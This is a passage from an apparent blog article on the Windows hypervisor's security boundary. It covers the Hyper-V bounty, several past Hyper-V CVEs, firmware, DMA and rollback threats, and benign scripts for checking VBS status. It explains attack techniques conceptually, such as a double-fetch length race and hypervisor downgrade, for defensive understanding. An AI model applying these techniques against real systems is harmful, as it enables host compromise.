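The guest-to-host denial-of-service case is deliberately left out of the table because the prose makes it conditional on whether the crash produces exploitable memory corruption.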

The dollar figures for these boundaries are documented in the Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]. The program ranges from $5,000 for the lowest-impact qualifying submission up to $250,000 for the highest. The eligibility language is verbatim:

"An eligible submission includes a Remote Code Execution (RCE) vulnerability in Microsoft Hyper-V that enables a L1 guest virtual machine to compromise the hypervisor, escape from the guest virtual machine to the host, or escape to another L1 guest virtual machine." -- Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]

$250,000 is the highest standing hypervisor bounty in the industry. Comparable programs from the other major hypervisor vendors do not publish the same calibration. KVM is a community project with no vendor-paid bounty pool of equivalent size. Xen is a Linux Foundation project that runs a bug bounty through HackerOne but does not publicly attach a $250,000 figure to a guest-to-host RCE. ESXi (Broadcom) does not publish a standing bounty program with a per-bug ceiling; bounty payments for ESXi RCEs typically flow through Pwn2Own and similar marketplaces, where Trend Micro's Zero Day Initiative sets the prize for any given competition.

The bounty calibration is itself a data point. If $250,000 were too high, Microsoft would be drowning in submissions; if it were too low, the public CVE record would show more hypervisor breaks reported through Pwn2Own than directly to MSRC. The current equilibrium -- two to four Microsoft-direct Hyper-V CVEs per year, and no Hyper-V guest-to-host escape demonstrated at Pwn2Own through the Berlin 2025 event [@zdi-pwn2own-day3] -- is consistent with the bounty being calibrated roughly correctly relative to the cost of finding a real bug.

| Vendor | Hypervisor | Published bounty | Ceiling | Servicing-criteria boundary published |
| --- | --- | --- | --- | --- |
| Microsoft | Hyper-V / `hvix64.exe` | Yes | $250,000 | Yes, verbatim language |
| Xen Project | Xen | Yes (HackerOne) | Lower, varies | Yes, security policy |
| KVM | KVM (community) | No standing program | -- | No vendor-published criteria |
| Broadcom/VMware | ESXi | No standing public bounty | -- | Vendor advisories per CVE |
| seL4 Project | seL4 | No (proof-rooted argument) | -- | Functional-correctness proof [@sel4-whitepaper] |

The seL4 row is included because seL4 is the only hypervisor in the table whose claim to a security boundary is mathematical rather than operational. seL4 ships approximately ten thousand lines of C and assembly with a machine-checked proof of functional correctness against a higher-level specification. The proof took roughly twenty-five person-years and covers a microkernel that does not by itself ship the full surface area of Hyper-V. The Microsoft hypervisor is unverified and, at the line count estimated in section 7, an order of magnitude larger; its security argument is operational (a small TCB, heavy fuzzing, a standing bounty, public servicing) rather than mathematical.

A serviced boundary is a contract. Contracts are not promises; they are obligations that come due when an attacker finds a way around them. To see what the contract has actually had to pay out, we read the public CVE record.

10. The Public Track Record -- Six Worked CVEs Across Three Classes

We do not need an exhaustive Hyper-V CVE catalog to understand the boundary's real shape. Six worked examples, drawn from three distinct attack classes, cover every public failure mode the boundary has produced since 2018. We walk them in order.

Class A: Device emulation in the root partition

CVE-2021-28476 (vmswitch.sys, May 2021, CVSS 9.9). Discovered by Ophir Harpaz at Guardicore Labs and Peleg Hadar at SafeBreach Labs using Guardicore's hAFL1 hypervisor fuzzer, the bug sits in how the host-side vmswitch.sys driver handles a guest-controlled OID_SWITCH_NIC_REQUEST parameter. The driver dereferenced an attacker-influenced object pointer, so the host kernel performed an arbitrary pointer dereference and the guest gained RCE in the root partition's kernel mode. The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) reflects guest-to-host RCE with Azure-scale blast radius: the bug was reachable from the vmswitch driver shipped in Windows builds well before the May 2021 patch, per the Guardicore Labs technical analysis [@nvd-cve-2021-28476]. The bug is the canonical anchor for "device emulation in the root partition is the largest Hyper-V attack surface."
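The 9.9 follows mechanically from the vector string. The sketch below implements the CVSS v3.1 base-score equations as published by FIRST; the function and constant names are my own, and the code covers base metrics only (no temporal or environmental scoring).

```javascript
// CVSS v3.1 base score from a vector string (base metrics only).
const WEIGHTS = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  UI: { N: 0.85, R: 0.62 },
  CIA: { H: 0.56, L: 0.22, N: 0 },
  // Privileges Required is weighted differently when Scope is Changed.
  PR: { U: { N: 0.85, L: 0.62, H: 0.27 }, C: { N: 0.85, L: 0.68, H: 0.5 } },
};

// The specification's Roundup: smallest one-decimal value >= x,
// computed on integers to avoid floating-point drift.
function roundUp1(x) {
  const scaled = Math.round(x * 100000);
  return scaled % 10000 === 0 ? scaled / 100000 : (Math.floor(scaled / 10000) + 1) / 10;
}

function cvss31BaseScore(vector) {
  const m = Object.fromEntries(vector.split('/').map((part) => part.split(':')));
  const scopeChanged = m.S === 'C';
  const iss = 1 - (1 - WEIGHTS.CIA[m.C]) * (1 - WEIGHTS.CIA[m.I]) * (1 - WEIGHTS.CIA[m.A]);
  const impact = scopeChanged
    ? 7.52 * (iss - 0.029) - 3.25 * Math.pow(iss - 0.02, 15)
    : 6.42 * iss;
  if (impact <= 0) return 0;
  const exploitability =
    8.22 * WEIGHTS.AV[m.AV] * WEIGHTS.AC[m.AC] * WEIGHTS.PR[m.S][m.PR] * WEIGHTS.UI[m.UI];
  const raw = scopeChanged ? 1.08 * (impact + exploitability) : impact + exploitability;
  return roundUp1(Math.min(raw, 10));
}

console.log(cvss31BaseScore('AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H')); // 9.9
```

The Scope: Changed term is what carries the score this high: it applies the 1.08 multiplier and the more generous Privileges Required weight, which is how the metric expresses that the impact lands outside the component the attacker started in.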

CVE-2025-21333 (NT Kernel Integration VSP, January 2025, CWE-122). The first publicly-acknowledged in-the-wild exploited Hyper-V CVE. The "Hyper-V NT Kernel Integration VSP" is a relatively new component that ties the Windows kernel-mode container architecture to Hyper-V's VSP/VSC pattern. A guest-controlled input triggered a heap-based buffer overflow on the host side of the integration; the host's address space was corruptible from a guest [@nvd-cve-2025-21333]. The operational pattern matches the vmswitch family: a host-side component receives structured, attacker-shaped input from a guest, and the host-side component overflows.

Class B: The hypercall input-validation path

CVE-2024-21407 (Hyper-V hypercall UAF, March 2024, CVSS 8.1, CWE-416). The rare case where the bug is in hvix64.exe / hvax64.exe itself, not in a root-partition driver. A guest crafted specially-formed file-operation hypercalls; the hypervisor dereferenced freed memory; the guest gained arbitrary host code execution [@nvd-cve-2024-21407].

CVE-2024-30092 (Hyper-V RCE, October 2024, CWE-20 + CWE-829). A Hyper-V remote code execution that combined improper input validation with inclusion of functionality from an untrusted control sphere -- another hypercall-path-class bug [@nvd-cve-2024-30092].

CVE-2024-49117 (Hyper-V RCE, December 2024, CVSS 8.8). A third 2024 Hyper-V RCE; the December Patch Tuesday entry rounded out a year in which three publicly-disclosed Hyper-V RCEs landed in twelve months, the most since the 2018 vmswitch family [@nvd-cve-2024-49117].

Class C: VTL0-to-VTL1 (the VBS break, not the hypervisor break)

CVE-2020-0917 and CVE-2020-0918 -- Amar and King, Black Hat USA 2020. Saar Amar and Daniel King's "Breaking VSM by Attacking SecureKernel" disclosed two paired vulnerabilities discovered with their Hyperseed hypercall fuzzer retargeted at securekernel!IumInvokeSecureService, the secure-call entry point. Vulnerability #1 -- which maps to CVE-2020-0917 -- is an out-of-bounds write in securekernel!SkmmObtainHotPatchUndoTable, the function that parses the hot-patch undo table at secure-call invocation time. Vulnerability #2 -- CVE-2020-0918 -- is a design flaw in SkmmUnmapMdl that lets VTL0 pass a fully attacker-controlled Memory Descriptor List to SkmiReleaseUnknownPTEs. The NVD entries for both CVEs are tracked as CWE-269 (Improper Privilege Management).

The Black Hat USA 2020 deck (verified via pdftotext at the canonical MSRC-Security-Research GitHub URL) explicitly labels Vulnerability #1 as OOB Write, in slides titled "The Vulnerable Function" and "The OOB" in the "Hardening SK" section [@amar-king-bh-2020]. Several secondary writeups across the web have transcribed the bug class as "OOB read," which is incorrect; the deck itself is the primary source and says write. The functions involved are also commonly conflated: IumInvokeSecureService is the secure-call dispatcher Hyperseed retargets to reach the buggy code; the actual bug is in SkmmObtainHotPatchUndoTable.

The Microsoft response is documented end-to-end in the same deck: the Secure Kernel pool was migrated to segment heap in mid-2019, four W+X regions were reduced to +X only, and SkpgContext -- a HyperGuard equivalent for Secure Kernel -- was introduced.

This is a different failure class than vmswitch RCE: not guest-to-host, but VTL0-to-VTL1 -- a Secure Kernel break reached through the hypervisor's secure-call dispatch from a privileged VTL0 attacker. Microsoft services it under the VBS / VSM boundary in the servicing criteria document, even though no guest VM is involved.

Key idea: Every public Hyper-V CVE since 2018 lives in one of three narrow code paths -- device emulation, hypercall input validation, or VTL0-to-VTL1 secure-call dispatch. The TLFS-visible primitives (intercepts, SynIC, per-VTL SLAT) have produced none.

The Pwn2Own dimension

Through Pwn2Own Berlin 2025, no public live Hyper-V guest-to-host escape has been demonstrated at Pwn2Own. The cross-vendor analogue -- and the industry's best calibration of how hard a hypervisor escape is to find when a researcher has a public dollar incentive and a deadline -- is the first-ever ESXi escape in Pwn2Own history, executed by Nguyen Hoang Thach of STAR Labs SG on Day Two (May 16, 2025) using a single integer overflow vulnerability in the hypervisor's DMA-handling path. The award was $150,000 plus 15 Master of Pwn points; STAR Labs went on to win overall Master of Pwn for the competition with $320,000 across three days [@zdi-pwn2own-day3].

The technique class is a TOCTOU on a length field read twice during a DMA operation: the first read validates the length, the second read uses it; race the second read and you write past a fixed-size buffer on the host heap. The exploit class is structurally the same as the vmswitch family, just landed in a different vendor's device-emulation path.
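The double-read pattern described in that paragraph is easy to show in miniature. The sketch below illustrates the general bug shape only; it is not a reconstruction of the Pwn2Own exploit, whose details are not public in this text. `makeRacyField` is a hypothetical stand-in for a length field in guest-writable memory that changes between two host reads.

```javascript
// Toy double-fetch model. makeRacyField simulates a guest rewriting a length
// field between the host's first and second read. All names are hypothetical.
function makeRacyField(validatedValue, racedValue) {
  let reads = 0;
  return {
    read() {
      reads += 1;
      return reads === 1 ? validatedValue : racedValue;
    },
  };
}

const BUFFER_SIZE = 16;

// Vulnerable shape: validate one read, then use a second, separate read.
function lengthDoubleFetch(field) {
  if (field.read() > BUFFER_SIZE) throw new RangeError('length too large');
  return field.read(); // may no longer match the value that was validated
}

// Fixed shape: read once into host-private state, then validate and use the copy.
function lengthSingleFetch(field) {
  const length = field.read();
  if (length > BUFFER_SIZE) throw new RangeError('length too large');
  return length;
}

console.log(lengthDoubleFetch(makeRacyField(8, 4096))); // 4096
console.log(lengthSingleFetch(makeRacyField(8, 4096))); // 8
```

The fix is structural rather than clever: anything the guest can write has to be copied out once before the host trusts it, which is the same discipline the vmswitch-class bugs violated on the Hyper-V side.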

| CVE | Class | Year | CVSS | Location | Source |
| --- | --- | --- | --- | --- | --- |
| CVE-2021-28476 | A: device emulation | 2021 | 9.9 | `vmswitch.sys` (root partition) | [@nvd-cve-2021-28476] |
| CVE-2025-21333 | A: device emulation | 2025 | 7.8 | NT Kernel Integration VSP (root partition) | [@nvd-cve-2025-21333] |
| CVE-2024-21407 | B: hypercall path | 2024 | 8.1 | `hvix64.exe` / `hvax64.exe` (hypervisor binary) | [@nvd-cve-2024-21407] |
| CVE-2024-30092 | B: hypercall path | 2024 | 7.5 | Hyper-V hypercall validation | [@nvd-cve-2024-30092] |
| CVE-2024-49117 | B: hypercall path | 2024 | 8.8 | Hyper-V hypercall validation | [@nvd-cve-2024-49117] |
| CVE-2020-0917/0918 | C: VTL0-to-VTL1 | 2020 | 6.8 (per MSRC) | `securekernel.exe` (VTL1, reached via secure call) | [@amar-king-bh-2020] |

```mermaid
flowchart LR
    subgraph CA["Class A: device emulation (root partition)"]
        Vmswitch["vmswitch.sys -- CVE-2021-28476"]
        Vsp["NT Kernel Integration VSP -- CVE-2025-21333"]
    end
    subgraph CB["Class B: hypercall input validation (hypervisor binary)"]
        UAF["CVE-2024-21407 (UAF)"]
        Input["CVE-2024-30092"]
        Hpcall["CVE-2024-49117"]
    end
    subgraph CC["Class C: VTL0-to-VTL1 (secure call dispatch)"]
        Oob["CVE-2020-0917 (OOB write)"]
        Mdl["CVE-2020-0918 (SkmmUnmapMdl)"]
    end
    Guest["Guest VM"] --> CA
    Guest --> CB
    Vtl0["Privileged VTL0 (kernel)"] --> CC
```

This is the third insight the article is built around. The reader's prior model may have been "hypervisors fail in mysterious, deep ways; the boundary is fragile in unknown places." The new model is "every public Hyper-V escape since 2018 lives in one of three narrow code paths, and the TLFS-visible primitives have produced none." The narrowness of the failure space is itself a security argument. The hypervisor's micro-kernelized design has held; what has not always held are the components Microsoft chose to put next to the hypervisor, in the root partition's user mode and kernel mode, by deliberate architectural choice in 2008.

Six worked examples; three classes; one boundary; an unflinching public record. The boundary is alive and producing CVEs at roughly two to four per year. But every CVE so far has lived somewhere the hypervisor itself controls. The interesting question is what lives in places it does not control.

11. The Residual Attack Surface -- Beneath, Beside, and Around

The hypervisor enforces a clean boundary against everything above it -- the NT kernel, user mode, even other guest VMs. It cannot, by construction, enforce anything against what lives below or beside it. Three structural classes of residual attack matter. We walk each.

11.1 Firmware below the hypervisor

System Management Mode (SMM), the UEFI runtime, the Intel Management Engine (ME), and the AMD Platform Security Processor (PSP) all run at higher privilege than the hypervisor for parts of boot and runtime. SMM in particular is a CPU mode that is invoked through System Management Interrupts (SMI) and has unrestricted access to all of physical memory, including the hypervisor's own pages. If the OEM-supplied SMM handler contains an exploitable bug, an SMI can run attacker code in a privilege mode strictly above the hypervisor's.

The threat is not hypothetical. The Binarly research team's 2023 LogoFAIL disclosures showed entire classes of image-parser bugs in UEFI firmware reachable from a privileged OS context; BootHole (CVE-2020-10713, a buffer overflow in GRUB2's grub.cfg parser) and BlackLotus (CVE-2022-21894, a UEFI Secure Boot bypass) showed that pre-boot bugs in widely-deployed bootloaders could ride past Secure Boot. None of these is a hypervisor bug; all of them are residual attack surface from the hypervisor's point of view.

Microsoft's mitigation is the dynamic root of trust for measurement -- System Guard Secure Launch -- which we touched on in section 8. After UEFI Secure Boot has done its static-RTM job, Intel TXT's SENTER (or AMD's SKINIT) executes a CPU-hardware-rooted late launch: the CPU resets to a known state, runs an Intel- or AMD-signed Authenticated Code Module (ACM), and measures the hypervisor binary into TPM PCRs 17-22 before transferring control to it. The result is that even if pre-boot firmware is compromised, the post-DRTM PCR values reflect the actual hypervisor binary; a compromised UEFI cannot silently substitute a different hypervisor without changing the attestation [@ms-system-guard-secure-launch, @ms-hardware-root-of-trust]. The residual after DRTM: OEMs that don't ship Secure Launch on their motherboards, or that ship buggy SMM handlers that can be invoked after launch.
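Why a substituted hypervisor cannot hide is a property of the TPM extend operation, which can only fold new measurements into a PCR and never set it directly. The sketch below shows that arithmetic for a SHA-256 bank using Node's built-in `crypto` module. The starting value and the measured strings are placeholders I chose for illustration; real DRTM measurements are digests of binaries and launch state, not labels.

```javascript
const { createHash } = require('node:crypto');

// TPM-style extend: new PCR value = SHA-256(old PCR value || digest of the data).
function extend(pcr, data) {
  const digest = createHash('sha256').update(data).digest();
  return createHash('sha256').update(Buffer.concat([pcr, digest])).digest();
}

// Assumption for the sketch: the DRTM PCR starts at all zeros after a late launch.
const start = Buffer.alloc(32, 0);

// Placeholder inputs standing in for the measured hypervisor binaries.
const expected = extend(start, Buffer.from('hypervisor build N+1'));
const swapped = extend(start, Buffer.from('hypervisor build N'));

console.log(expected.toString('hex') === swapped.toString('hex')); // false

// Order matters too: the same two measurements in a different order
// produce a different final value.
const ab = extend(extend(start, Buffer.from('A')), Buffer.from('B'));
const ba = extend(extend(start, Buffer.from('B')), Buffer.from('A'));
console.log(ab.equals(ba)); // false
```

A verifier that knows the expected final value therefore detects both a substituted component and a reordered launch sequence, without needing to trust anything that ran before the late launch.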

11.2 Hardware side channels

Microarchitectural side-channel attacks cross the VTL boundary at the level of CPU implementation, not at the level of architectural specification. The 2018 Spectre and Meltdown disclosures -- followed by the L1TF, MDS, Retbleed, and CacheWarp families in the years since -- showed that speculatively-executed code on a CPU can leak microarchitectural state across privilege boundaries that the architectural ISA promises to protect.

Microsoft's mitigation cadence has been in-tree and aggressive: Kernel Virtual Address Shadow (the Windows equivalent of KPTI) for Meltdown; IBRS, STIBP, and retpolines for Spectre v2; HyperClear for L1TF on Hyper-V hosts. Each Patch Tuesday since 2018 has shipped at least one microarchitectural mitigation; cumulatively the cost has been measurable but bounded.

Note: The microarchitectural ceiling is hardware, not software. Intel TDX and AMD SEV-SNP -- the two confidential-computing architectures that move the trust root from the hypervisor to per-VM hardware encryption -- both explicitly disclaim resistance to this class. If the CPU leaks across a Spectre-class side channel, no software-level isolation primitive (VTL, partition, SEAM, SEV-SNP) can fully recover the property. The mitigation is hardware that doesn't leak, and that mitigation arrives one CPU generation at a time.

11.3 IOMMU and DMA bypass

The IOMMU -- Intel VT-d, AMD-Vi -- is the hardware that gates DMA from peripheral devices to physical memory. If the IOMMU is configured correctly, a Thunderbolt-attached device cannot read or write arbitrary memory; it can only DMA to regions the OS has explicitly mapped for it. If the IOMMU is disabled, configured permissively, or has firmware bugs of its own, DMA becomes an end-run around every architectural protection above it -- including the hypervisor's.

The threat is again not hypothetical. Björn Ruytenberg's Thunderspy disclosure in 2020 documented seven DMA-class vulnerabilities in Thunderbolt 3 firmware, demonstrating that an attacker with physical access could read or modify arbitrary memory on a powered-on system through a malicious peripheral [@thunderspy]. The Microsoft mitigation is Kernel DMA Protection (Windows 10 1803 and later): the hypervisor configures the IOMMU at boot to deny DMA from externally-attached devices outside of explicitly authorized regions, and DMA from any peripheral whose driver has not been loaded under a trusted policy is refused at the IOMMU [@ms-kernel-dma-protection]. The structural residual: pre-boot DMA, before Windows has finished configuring the IOMMU; client motherboards that still ship with VT-d or AMD-Vi disabled in BIOS; OEMs that disable Kernel DMA Protection by default.
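The default-deny behavior described above can be modeled as a per-device allowlist of address ranges. This is a simplified sketch, not how VT-d or AMD-Vi page tables are actually programmed: `createIommu`, the device names, and the addresses are all hypothetical.

```javascript
// Toy IOMMU: each device may DMA only into ranges explicitly authorized for it.
// A device with no entry (for example, no trusted driver loaded) gets nothing.
function createIommu() {
  const allowed = new Map(); // deviceId -> array of { base, size }
  return {
    authorize(deviceId, base, size) {
      if (!allowed.has(deviceId)) allowed.set(deviceId, []);
      allowed.get(deviceId).push({ base, size });
    },
    permits(deviceId, addr, length) {
      const regions = allowed.get(deviceId) || [];
      // The whole transfer must fit inside a single authorized region.
      return regions.some((r) => addr >= r.base && addr + length <= r.base + r.size);
    },
  };
}

const iommu = createIommu();
iommu.authorize('nic0', 0x10000, 0x1000); // hypothetical device and range

console.log(iommu.permits('nic0', 0x10000, 0x200)); // true
console.log(iommu.permits('nic0', 0x10f00, 0x200)); // false
console.log(iommu.permits('tb-dock', 0x10000, 0x10)); // false
```

The second call fails because the transfer would run past the end of the authorized range, and the third fails because the device was never authorized at all. The residual cases in the paragraph above are the ones where this table is empty or not yet enforced: before boot-time configuration, or with the IOMMU switched off.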

11.4 Hypervisor downgrade and rollback

Alon Leviev's "Windows Downdate" at Black Hat USA 2024 disclosed a class of attack that the prior three sections do not cover: rollback of the hypervisor binary itself to a previously-vulnerable, but still validly-signed, build [@nvd-cve-2024-21302].

The structural argument: UEFI Secure Boot prevents loading an unsigned hvix64.exe. It does not prevent loading an older hvix64.exe that is validly signed and has not been revoked. If Microsoft fixes a Secure Kernel bug in build N+1 and a VTL0 attacker can convince the system to load build N at the next reboot, the patched bug is alive again. CVE-2024-21302 demonstrated exactly this rollback against both the hypervisor and the Secure Kernel through manipulation of the Windows Update servicing pipeline. The mitigation is mandatory-update servicing combined with proactive revocation list (dbx) hygiene -- once an older binary's hash is in the UEFI revocation list, Secure Boot will refuse to load it -- and Microsoft completed mitigations across Windows 10 1507 through Windows Server 2019 in the July 8, 2025 update wave [@nvd-cve-2024-21302].
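The gap is visible once the load decision is written as two independent checks. The sketch below is a deliberately reduced model: `secureBootAllows`, the `binary` shape, and the placeholder hash strings are hypothetical, and real Secure Boot verification involves certificate chains and authenticated variables that are not modeled here.

```javascript
// Reduced model of the load decision: a valid signature is necessary,
// but only the revocation list (dbx) can retire an old, signed build.
function secureBootAllows(binary, dbx) {
  if (!binary.signatureValid) return { load: false, reason: 'unsigned or bad signature' };
  if (dbx.has(binary.hash)) return { load: false, reason: 'hash is revoked (dbx)' };
  return { load: true, reason: 'signed and not revoked' };
}

// Placeholder values; real entries are cryptographic hashes.
const buildN = { name: 'hvix64.exe (build N, vulnerable)', hash: 'hash-of-build-N', signatureValid: true };
const dbx = new Set();

console.log(secureBootAllows(buildN, dbx).load); // true

dbx.add(buildN.hash); // revocation shipped
console.log(secureBootAllows(buildN, dbx).load); // false
```

Between the patch for build N+1 and the moment the old hash lands in `dbx`, the first result is the one an attacker gets. That window is the whole attack, which is why the mitigation is described in terms of revocation hygiene rather than signature strength.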

```mermaid
flowchart TD
    HW["Hardware (CPU, RAM, IOMMU, TPM)"]
    SM["System Management Mode (Ring -2) -- residual: SMM handler bugs"]
    FW["UEFI firmware -- residual: LogoFAIL, BootHole, BlackLotus"]
    DR["DRTM ACM (Intel TXT / AMD SKINIT)"]
    HV["Microsoft Hypervisor (hvix64 / hvax64)"]
    Iommu["IOMMU (VT-d / AMD-Vi) -- residual: Thunderspy, pre-boot DMA"]
    Vtl1["VTL1 (Secure Kernel + trustlets)"]
    Vtl0["VTL0 (NT kernel + user mode)"]
    Side["Microarchitectural side channels -- Spectre / Meltdown / MDS / Retbleed"]
    Update["Windows Update servicing -- residual: hypervisor rollback (CVE-2024-21302)"]
    HW --> SM
    SM --> FW
    FW --> DR
    DR --> HV
    HV --> Iommu
    HV --> Vtl1
    HV --> Vtl0
    Side -.->|"cross all boundaries"| HV
    Update -.->|"can roll hypervisor back"| HV
```

The hypervisor is necessary but not sufficient. The firmware-Secure-Boot-DRTM substrate beneath it, the microarchitectural ceiling above it, the IOMMU configuration beside it, and the Windows Update pipeline that decides which hypervisor build runs next are co-equal members of the same boundary. None of them is the hypervisor; all of them have to do their job for the hypervisor's guarantees to hold. The substrate is real, but the boundary is the combination of the substrate and what holds it up.

Necessary, not sufficient. That phrase is the article's honest answer to the question "how good is the substrate?" The answer is that the substrate is genuine, the boundary is published, the bounty calibration is the highest in the industry, the public CVE record is alive and narrow, and the residual attack surface lives in places the hypervisor cannot by construction control. The substrate is what we have explored in detail; what holds it up is what we have just sketched. The last section turns from theory to practice.

12. Practical Guide, FAQ, and Closing

If you have read this far, the natural next question is "is this on, on my machine, and how do I check?" The practical answer is short.

12.1 Enabling and verifying VBS

VBS is configurable through several paths: Group Policy (Computer Configuration > Administrative Templates > System > Device Guard), Intune, MDM CSPs (DeviceGuard/EnableVirtualizationBasedSecurity, DeviceGuard/ConfigureSystemGuardLaunch), the Windows Security UI, or directly via bcdedit /set hypervisorlaunchtype Auto. Verification is best done with three small commands.

msinfo32 -> the Device Guard / Virtualization-based Security row. "Services Configured" lists what policy has requested; "Services Running" lists what is actually active. Kernel DMA Protection and Secure Launch each appear as their own row.
Get-CimInstance -ClassName Win32_DeviceGuard -> VirtualizationBasedSecurityStatus (0 = off, 1 = enabled but not running, 2 = running); SecurityServicesRunning array (HVCI, Credential Guard, etc.); RequiredSecurityProperties (the policy floor).
bcdedit /enum -> hypervisorlaunchtype Auto is the default; loadoptions DISABLE_VBS_* is how an administrator can opt out (you should not see these flags on a properly-configured machine).

```javascript
// Given a parsed Win32_DeviceGuard object, compute whether VBS is healthy.
// The actual Win32_DeviceGuard schema is on Microsoft Learn; this is the
// decision logic an operator would write against it.
function checkVbsHealth(dg) {
  const result = { ok: false, reasons: [] };

  // VBS itself: 2 means enabled and running.
  if (dg.VirtualizationBasedSecurityStatus !== 2) {
    result.reasons.push('VBS is not running (status != 2)');
  }

  // HVCI (Memory Integrity) is service code 2.
  if (!dg.SecurityServicesRunning.includes(2)) {
    result.reasons.push('HVCI / Memory Integrity is not running');
  }

  // Credential Guard is service code 1.
  if (!dg.SecurityServicesRunning.includes(1)) {
    result.reasons.push('Credential Guard is not running');
  }

  // Floor of platform properties this check insists on. These are
  // security-property codes, not service codes:
  // 1 = hypervisor support, 2 = Secure Boot, 3 = DMA protection.
  const requiredFloor = [1, 2, 3];
  for (const r of requiredFloor) {
    if (!dg.AvailableSecurityProperties.includes(r)) {
      result.reasons.push('Missing required security property: ' + r);
    }
  }

  result.ok = result.reasons.length === 0;
  return result;
}

const example = {
  VirtualizationBasedSecurityStatus: 2,
  SecurityServicesRunning: [1, 2, 3],
  AvailableSecurityProperties: [1, 2, 3, 4, 5],
};
console.log(JSON.stringify(checkVbsHealth(example), null, 2));
// Prints a JSON object with "ok": true and an empty "reasons" array.
```

Note: Three commands, in order: msinfo32 for the human-readable summary; Get-CimInstance -ClassName Win32_DeviceGuard | Format-List * for the structured detail; bcdedit /enum {current} to confirm hypervisorlaunchtype Auto and the absence of DISABLE_VBS_* load options. If all three agree that VBS, HVCI, and Credential Guard are running, you are in the configuration this article describes.

12.2 Operational pitfalls

Two operational realities are worth flagging. First, HVCI has a driver block list and will refuse to enable Memory Integrity if any incompatible driver is installed; the usual offenders are older anti-cheat drivers, third-party virtualization clients (VMware Workstation pre-2021, VirtualBox pre-6.1), and certain disk-encryption or storage-filter drivers. Microsoft maintains a public block list; the Memory Integrity UI in Windows Security will report the specific blocking driver. Second, nested virtualization is supported for Hyper-V guests on Windows 10/11 client and Server 2016+, and is required by some development workflows (WSL2 with nested containers, certain Visual Studio device emulators). Nested virtualization changes the threat model: the L0 hypervisor still owns the box, but the L1 guest now runs its own hypervisor with its own VTL split. The guest-to-host boundary does not move, though: compromising an L1 guest, with or without VBS enabled inside it, still does not give the attacker a path to the L0 host.

12.3 The substrate cross-reference

This article is the substrate of the Windows security series at paragmali.com. The siblings build on what is here:

Secure Boot in Windows -- the static-RTM half of the boot trust chain that hands off to the hypervisor.
VBS Trustlets: What Actually Runs in the Secure Kernel -- the VTL1 internals that the hypervisor's secure-call ABI delivers requests to.
NTLMless: The Death of NTLM in Windows -- the Credential Guard story from inside LSAISO.
Adminless: Administrator Protection in Windows -- the user-mode admin trust model that the kernel-mode VBS boundary makes possible.
Can This Code Do This? Windows Access Control -- the access-control surface that VBS supplements but does not replace.

12.4 Frequently asked questions

The 10-30 percent number is folklore from the pre-SLAT era or from systems running HVCI-incompatible drivers in compatibility mode. For typical workloads on modern hardware (post-2018 CPUs with VT-x or AMD-V and SLAT), the measured overhead of VBS plus HVCI plus Credential Guard sits in the low single digits. Gaming and high-throughput I/O workloads can show larger gaps, especially on systems where the BIOS forces nested virtualization off or where IOMMU is disabled. The trade-off for that overhead is the security-boundary set described in this article.

No. VBS is a Virtual Trust Level split *inside* the root partition. There are no extra VMs. The normal Windows install is VTL0; the Secure Kernel plus its trustlets is VTL1. Both VTLs live in the same partition, share the same physical CPU, and are scheduled by the hypervisor as separate VTL contexts -- not as separate VMs. A Hyper-V guest VM, by contrast, is a child partition entirely separate from the root partition. The two architectures share a hypervisor binary but use different parts of it.

No. SYSTEM is a high VTL0 user-mode token; the hypervisor sits architecturally above all of Ring 0, which is where SYSTEM-loaded kernel drivers ultimately run. The point of the entire article is that "SYSTEM owns the box" is wrong on a VBS-enabled Windows install. SYSTEM is the most privileged Windows identity; the hypervisor is the most privileged *software*, and the two are not the same thing.

No. Secure Boot prevents loading an *unsigned* `hvix64.exe`. It does not prevent loading an older, signed-but-vulnerable `hvix64.exe` that has not been added to the UEFI revocation list. That gap is what CVE-2024-21302 (Windows Downdate) exploited, and the mitigation is mandatory-update servicing combined with prompt revocation-list (`dbx`) hygiene [@nvd-cve-2024-21302].

No. seL4 is formally verified at approximately ten thousand lines of code with a roughly twenty-five-person-year proof effort. The Microsoft hypervisor is unverified at an estimated one to two hundred thousand lines of code. The hypervisor's security argument is operational -- a small TCB, heavy continuous fuzzing, a standing $5K-$250K bounty, public servicing criteria, an unflinching public CVE record -- rather than mathematical [@sel4-whitepaper, @ms-msrc-bounty-hyperv].

Yes, in terms of binary identity, servicing criteria, and bounty eligibility. The Microsoft hypervisor that boots on a Windows 11 client laptop and the one that boots on an Azure host server are derived from the same codebase, ship with the same servicing commitments, and qualify for the same Hyper-V bounty. The threat model differs -- Azure adds multi-tenant guest-to-guest isolation, hardware confidential-VM extensions, and a different management surface -- but the substrate is shared.

12.5 Closing

The reason SYSTEM on a Windows 11 box cannot read LSASS, load an unsigned driver, or patch ntoskrnl.exe is now fully accounted for. An hvix64.exe or hvax64.exe loaded by hvloader.efi before winload.exe ever ran. A VTL split inside the root partition, made possible by Hepkin and Kishan's 2013 patent and shipped with Windows 10 RTM in 2015. Per-VTL SLAT enforcement that the NT kernel architecturally cannot touch, because the SLAT tables live in pages the hypervisor never maps into a VTL0 view. A Microsoft-published security boundary and a $5,000-$250,000 bounty calibrating the boundary's value, both of which are unique in the industry at this writing. A public CVE record of six worked examples across three narrow classes that the boundary has had to pay out on since 2018. And a residual attack surface -- firmware below, side channels above, IOMMU bypass beside, hypervisor rollback through the update pipeline -- that the substrate cannot, by construction, eliminate.

The hypervisor is what every other article in this series sits on. Now you have the substrate in hand. The Secure Kernel article reads differently when you have walked the per-VTL SLAT yourself. The Credential Guard article reads differently when you know that LSAISO is invoked through a hypercall-mediated secure call. The Secure Boot article reads differently when you know that the hypervisor's DRTM measurement re-establishes the trust root after firmware. The Adminless article reads differently when you know that the privilege ceiling on Windows 11 is not Ring 0 but a hardware boundary above it.

Above Ring Zero is not a metaphor. It is an instruction-set state. The Windows hypervisor lives there, owns the page tables that say what the OS can see, and is the architectural reason "SYSTEM-on-Windows-11" cannot do things SYSTEM used to be allowed to do.

Adminless: How Windows Finally Made Elevation a Security Boundary

noreply@paragmali.com (Parag Mali) — Sun, 10 May 2026 00:00:00 GMT

